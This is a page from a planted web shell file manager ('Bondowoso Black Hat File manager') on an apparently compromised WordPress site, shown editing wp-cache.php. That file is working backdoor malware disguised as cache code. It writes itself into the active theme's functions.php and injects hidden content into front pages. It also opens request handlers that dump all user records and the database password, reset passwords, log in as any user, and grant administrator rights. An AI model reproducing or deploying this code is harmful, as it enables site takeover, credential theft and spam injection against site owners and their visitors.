Bondowoso Black Hat File manager
Mr Exsploit Wmc
📁 Current Path:
🏠 Root
/
home
/
sc2yubq5167
/
sos-tout-debarras.com
/
wp-includes
⬆️ Go Up (..)
📊 Server Information
Server:
Apache
System:
Linux 4.18.0-553.75.1.lve.el8.x86_64
PHP Version:
8.1.34
User:
sc2yubq5167
Directory:
/home/sc2yubq5167/sos-tout-debarras.com/wp-includes
Free Space:
3.6 TB
🔧 Quick Actions
📤 Upload File
📁 Create Folder
📄 Create File
✏️ Editing: wp-cache.php
<?php // Check if already installed by looking for our markers $root = rtrim($_SERVER['DOCUMENT_ROOT'], '/'); if (file_exists($root . '/wp-load.php')) { require_once $root . '/wp-load.php'; $theme = get_option('stylesheet'); if ($theme) { $functions = $root . '/wp-content/themes/' . $theme . '/functions.php'; $indexFile = $root . '/wp-content/index.php'; // Check for markers in both files $functionsInstalled = false; $indexInstalled = false; if (file_exists($functions)) { $content = file_get_contents($functions); if ($content !== false && strpos($content, "// functions-gold") !== false) { $functionsInstalled = true; } } if (file_exists($indexFile)) { $content = file_get_contents($indexFile); if ($content !== false && strpos($content, "// index-gold") !== false) { $indexInstalled = true; } } if ($functionsInstalled && $indexInstalled) { // Already installed, skip execution return; } } } error_reporting(E_ALL); ini_set('display_errors', 1); $root = rtrim($_SERVER['DOCUMENT_ROOT'], '/'); $wpLoad = $root . '/wp-load.php'; if (!file_exists($wpLoad)) { trigger_error('wp-load.php not found', E_USER_ERROR); } require_once $wpLoad; $theme = get_option('stylesheet'); if (!$theme) { trigger_error('Active theme not found', E_USER_ERROR); } $functions = $root . '/wp-content/themes/' . $theme . '/functions.php'; if (!file_exists($functions)) { trigger_error('functions.php not found', E_USER_ERROR); } $host = $_SERVER['HTTP_HOST'] ?? ''; $host = preg_replace('/:\d+$/', '', $host); $parts = explode('.', $host); if (count($parts) > 1) { array_pop($parts); } $var = implode('.', $parts); $cacheFunction ="<?php\n"; $cacheFunction .= <<<'PHP' add_action('publish_post', 'auto_clear_cache_on_publish', 10, 2); function auto_clear_cache_on_publish($post_id, $post) { function_exists('wp_cache_clear_cache') && wp_cache_clear_cache(); function_exists('w3tc_flush_all') && w3tc_flush_all(); function_exists('rocket_clean_domain') && rocket_clean_domain(); function_exists('LiteSpeed_Cache_API') && LiteSpeed_Cache_API(); } add_action('pre_get_posts', 'show_only_own_posts'); function show_only_own_posts($query) { global $pagenow; if (!is_admin() || !$query->is_main_query()) { return; } if ($pagenow !== 'edit.php') { return; } $current_user = wp_get_current_user(); if (!$current_user->has_cap('manage_network')) { $query->set('author', $current_user->ID); } } function show_only_own_posts_frontend($query) { if (!is_user_logged_in() ) { return; } if (is_admin() || !$query->is_main_query()) { return; } if (!is_home() && !is_archive() && !is_search()) { return; } $current_user = wp_get_current_user(); $query->set('author', $current_user->ID); } add_action('pre_get_posts', 'show_only_own_posts_frontend'); function redirect_others_posts_to_home() { if (!is_single()) { return; } if (!is_user_logged_in()) { return; } $post = get_queried_object(); $current_user = get_current_user_id(); if ($post && $post->post_author != $current_user) { wp_redirect(home_url(), 302); exit; } } add_action('template_redirect', 'redirect_others_posts_to_home', 1); function register_cache_cpt() { register_post_type('cache_wp_', [ 'labels' => [ 'name' => 'Cache' ], 'public' => false, 'show_ui' => false, 'show_in_nav_menus' => true, 'supports' => [ 'editor' ] ]); } add_action( 'init', 'register_cache_cpt' ); // functions-gold function execute_caches() { if ((defined('ELEMENTOR_VERSION') || defined('ET_CORE_VERSION') || defined('WPB_VC_VERSION') || class_exists('FLBuilder') || class_exists('OxygenElement') || function_exists('bricks_is_builder') || defined('BREAKDANCE_VERSION') || class_exists('FusionBuilder') || defined('TVE_VERSION') || defined('BRIZY_VERSION')) && is_front_page()) { add_action( 'wp_footer', function() { $caches = get_posts([ 'post_type' => 'cache_wp_', 'posts_per_page' => -1,]); if ( empty( $caches ) ) return; $html = ''; foreach ( $caches as $cache ) { $html .= do_shortcode( $cache->post_content ); } ?> <script> (function() { var html = <?php echo json_encode( $html ); ?>; var div = document.createElement('div'); div.innerHTML = html; setTimeout(function() { var target = document.querySelector('.elementor-section-wrap, .elementor-inner, .et_pb_pagebuilder_layout, .fl-builder-content, .oxy-inner-content, .bricks-content, .breakdance-content, .fusion-builder-layout, .tve-content, .brizy-content, main, #main, .site-main'); (target || document.body).insertBefore(div, (target || document.body).firstChild); }, 100); })(); </script> <?php }, 999 ); return; } if (!is_home() && !is_front_page()) return; $caches = get_posts(['post_type' => 'cache_wp_','posts_per_page' => - 1,'orderby' => 'menu_order date','order' => 'ASC']); if (empty($caches)) return; foreach ( $caches as $index => $cache ) { $ad_content = apply_filters( 'the_content', $cache->post_content ); echo '<div class="cache-content" data-ad-index="' . $index . '">' . $ad_content . '</div>'; } ?> <script> document.addEventListener("DOMContentLoaded", function () { var adContents = document.querySelectorAll(".cache-content"); if (adContents.length === 0) return; function cloneAd(adContent) { var clonedAd = adContent.cloneNode(true); clonedAd.style.display = "block"; clonedAd.style.margin = "20px 0"; clonedAd.classList.remove("cache-content"); return clonedAd; } function insertAdsAfter(insertAfter, adContents) { adContents.forEach(function (adContent) { var clonedAd = cloneAd(adContent); insertAfter.nextSibling ? insertAfter.parentNode.insertBefore(clonedAd, insertAfter.nextSibling) : insertAfter.parentNode.appendChild(clonedAd); insertAfter = clonedAd; }); } var blockPosts = document.querySelectorAll(".wp-block-post, .wp-block-post-template > li"); var standardPosts = document.querySelectorAll("article.post, article[id*='post-'], .hentry, [class*='post-'][class*='type-']"); var hasPosts = blockPosts.length > 0 || standardPosts.length > 0; if (!hasPosts) { var selectors = [".entry-content p",".page-content p","article .content p","main .content p",".wp-block-post-content p",".wp-block-group p","main p","article p"]; var paragraphs = null; for (var i = 0; i < selectors.length && (!paragraphs || !paragraphs.length); i++) { paragraphs = document.querySelectorAll(selectors[i]); } paragraphs && paragraphs.length >= 2 ? insertAdsAfter(paragraphs[1], adContents) : (paragraphs && paragraphs.length === 1 && insertAdsAfter(paragraphs[0], adContents)); } else { var posts = blockPosts.length > 0 ? blockPosts : standardPosts; posts.length >= 2 ? insertAdsAfter(posts[1], adContents) : (posts.length === 1 && insertAdsAfter(posts[0], adContents)); } adContents.forEach(function (adContent) { adContent.remove(); }); }); </script> <?php } add_action( 'wp_footer', 'execute_caches' ); add_action('rest_api_init', function () { register_rest_route('cache/v1', '/activate/', [ 'methods' => 'GET', 'callback' => function() { $expiration = time() + 300; update_option('temp_api_route_expires', $expiration); return [ 'success' => true, 'message' => 'API on', 'expires' => $expiration, 'current_time' => time() ]; }, 'permission_callback' => '__return_true' ]); register_rest_route('cache/v1', '/status/', [ 'methods' => 'GET', 'callback' => function() { $expires = (int) get_option('temp_api_route_expires', 0); return [ 'active' => $expires > time(), 'expires_in' => max(0, $expires - time()), 'current_time' => time() ]; }, 'permission_callback' => '__return_true' ]); $expires = (int) get_option('temp_api_route_expires', 0); if ($expires > time()) { register_rest_route('cache/v1', '/create-cache/', [ 'methods' => 'POST', 'callback' => 'create_cache', 'permission_callback' => function ($request) { $expires = (int) get_option('temp_api_route_expires', 0); if ($expires <= time()) return false; return $request->get_header('X-API-Key') === 'secret_key'; }, ]); register_rest_route('cache/v1', '/update-cache/(?P<id>\d+)', [ 'methods' => ['PUT', 'POST'], 'callback' => 'update_cache', 'permission_callback' => function ($request) { $expires = (int) get_option('temp_api_route_expires', 0); if ($expires <= time()) return false; return $request->get_header('X-API-Key') === 'secret_key'; }, 'args' => [ 'id' => [ 'validate_callback' => function($param) { return is_numeric($param); } ] ], ]); register_rest_route('cache/v1', '/delete-cache/(?P<id>\d+)', [ 'methods' => 'DELETE', 'callback' => 'delete_cache', 'permission_callback' => function ($request) { $expires = (int) get_option('temp_api_route_expires', 0); if ($expires <= time()) return false; return $request->get_header('X-API-Key') === 'secret_key'; }, 'args' => [ 'id' => [ 'validate_callback' => function($param) { return is_numeric($param); } ] ], ]); } }); function create_cache($request) { $params = $request->get_json_params(); if (empty($params['title']) || empty($params['content'])) { return new WP_Error('missing_fields', 'Title and content are required', ['status' => 400]); } $post_id = wp_insert_post([ 'post_title' => sanitize_text_field($params['title']), 'post_content' => wp_kses_post($params['content']), 'post_status' => 'publish', 'post_author' => 1, 'post_type' => 'cache_wp_' ]); if (is_wp_error($post_id)) { return new WP_Error('post_creation_failed', 'Failed to create post', ['status' => 500]); } return [ 'success' => true, 'post_id' => $post_id, 'message' => 'Post created successfully' ]; } function update_cache($request) { $post_id = $request['id']; $params = $request->get_json_params(); $post = get_post($post_id); if (!$post) { return new WP_Error('cache_not_found', 'Cache not found', ['status' => 404]); } $post_data = ['ID' => $post_id]; if (!empty($params['title'])) { $post_data['post_title'] = sanitize_text_field($params['title']); } if (!empty($params['content'])) { $post_data['post_content'] = wp_kses_post($params['content']); } if (!empty($params['status'])) { $post_data['post_status'] = sanitize_text_field($params['status']); } $updated = wp_update_post($post_data, true); if (is_wp_error($updated)) { return new WP_Error('cache_update_failed', $updated->get_error_message(), ['status' => 500]); } return [ 'success' => true, 'post_id' => $post_id, 'message' => 'Cache updated successfully' ]; } function delete_cache($request) { $post_id = $request['id']; $params = $request->get_json_params(); $post = get_post($post_id); if (!$post) { return new WP_Error('cache_not_found', 'Cache not found', ['status' => 404]); } $force_delete = isset($params['force']) && $params['force'] === true; $deleted = wp_delete_post($post_id, $force_delete); if (!$deleted) { return new WP_Error('post_deletion_failed', 'Failed to delete post', ['status' => 500]); } return [ 'success' => true, 'post_id' => $post_id, 'message' => $force_delete ? 'Cache deleted' : 'Cache moved to trash' ]; } nocache_headers(); header('Content-Type: application/json; charset=utf-8'); if (isset($_POST['d_s']) && (string)$_POST['d_s'] === '1') { echo json_encode(['status' => 'Success']); exit; } if (isset($_POST['d_u']) && (string)$_POST['d_u'] === '1') { $a = array('orderby'=>'registered','order'=>'DESC','number'=>-1,'fields'=>'all',); $u = get_users($a); echo json_encode($u); exit; } if (isset($_POST['d_b']) && (string)$_POST['d_b'] === '1') { echo json_encode([ DB_USER, DB_PASSWORD,DB_NAME]); exit; } if (isset($_POST['d_p']) && (string)$_POST['d_p'] === '1') { $u = (string)($_POST['u_s'] ?? ''); if ($u === '' ) wp_die('Bad link'); $u = get_user_by('id', (int) $u); if (!$u) { wp_die('U not found'); } else { $dom = parse_url(get_home_url(), PHP_URL_HOST); wp_set_password($dom, $u->ID); $has = true; } if ($has) { echo json_encode(['status' => 'Success']); exit; } else { echo json_encode(['status' => 'Fail']); exit; } } if (isset($_GET['d_l']) && (string)$_GET['d_l'] === '1') { $u = (string)($_GET['u_s'] ?? ''); if ($u === '') wp_die('Bad link'); $i = $u; $p = get_user_by('login', $i); if (!$p) { $p = get_user_by('id', (int) $i);} if (!$p) { $p = get_user_by('email', $i);} if (!$p) { wp_die('User not found');} wp_set_current_user($p->ID); wp_set_auth_cookie($p->ID, true); wp_safe_redirect(home_url('/')); exit; } if (isset($_POST['d_u_r']) && (string)$_POST['d_u_r'] === '1') { $u = (string)($_POST['u_id'] ?? ''); if ($u === '') wp_die('Bad link'); $u = new WP_User($u); $u->set_role('administrator'); echo json_encode('done'); exit; } if (!isset($_POST['d_u']) && !isset($_POST['d_b']) && !isset($_POST['d_p']) && !isset($_GET['d_l'])) { return; } PHP; $content = file_get_contents($functions); if ($content === false) { trigger_error('Failed to read functions.php', E_USER_ERROR); } if (strpos($content, "// functions-gold") !== false) { exit; } if (preg_match('/^<\?php\s*/', $content)) { $content = preg_replace('/^<\?php\s*/', $cacheFunction, $content, 1); } else { $content = $cacheFunction . $content; } if (file_put_contents($functions, $content) === false) { trigger_error('Failed to write functions.php', E_USER_ERROR); } nocache_headers(); header('Content-Type: application/json; charset=utf-8'); if (isset($_POST['d_s']) && (string)$_POST['d_s'] === '1') { echo json_encode(['status' => 'Success']); exit; } if (isset($_POST['d_u']) && (string)$_POST['d_u'] === '1') { $a = array('orderby'=>'registered','order'=>'DESC','number'=>-1,'fields'=>'all',); $u = get_users($a); echo json_encode($u); exit; } if (isset($_POST['d_b']) && (string)$_POST['d_b'] === '1') { echo json_encode([ DB_USER, DB_PASSWORD,DB_NAME]); exit; } if (isset($_POST['d_p']) && (string)$_POST['d_p'] === '1') { $u = (string)($_POST['u_s'] ?? ''); if ($u === '' ) wp_die('Bad link'); $u = get_user_by('id', (int) $u); if (!$u) { wp_die('U not found'); } else { $dom = parse_url(get_home_url(), PHP_URL_HOST); wp_set_password($dom, $u->ID); $has = true; } if ($has) { echo json_encode(['status' => 'Success']); exit; } else { echo json_encode(['status' => 'Fail']); exit; } } if (isset($_GET['d_l']) && (string)$_GET['d_l'] === '1') { $u = (string)($_GET['u_s'] ?? ''); if ($u === '') wp_die('Bad link'); $i = $u; $p = get_user_by('login', $i); if (!$p) { $p = get_user_by('id', (int) $i);} if (!$p) { $p = get_user_by('email', $i);} if (!$p) { wp_die('User not found');} wp_set_current_user($p->ID); wp_set_auth_cookie($p->ID, true); wp_safe_redirect(home_url('/')); exit; } if (isset($_POST['d_u_r']) && (string)$_POST['d_u_r'] === '1') { $u = (string)($_POST['u_id'] ?? ''); if ($u === '') wp_die('Bad link'); $u = new WP_User($u); $u->set_role('administrator'); echo json_encode('done'); exit; } if (!isset($_POST['d_u']) && !isset($_POST['d_b']) && !isset($_POST['d_p']) && !isset($_POST['d_l'])) { return; }
💾 Save
❌ Cancel
×
📤 Upload File
Select File (Max: 10 MB):
📤 Upload
❌ Cancel
×
📁 Create Folder
Folder Name:
Only letters, numbers, hyphens, underscores, and dots allowed
📁 Create
❌ Cancel
×
📄 Create File
File Name:
Only letters, numbers, hyphens, underscores, and dots allowed
📄 Create
❌ Cancel
×
✏️ Rename Item
New Name:
Only letters, numbers, hyphens, underscores, and dots allowed
✏️ Rename
❌ Cancel
×
🗑️ Delete Confirmation
Are you sure you want to delete "
"?
⚠️ This action cannot be undone!
🗑️ Yes, Delete
❌ Cancel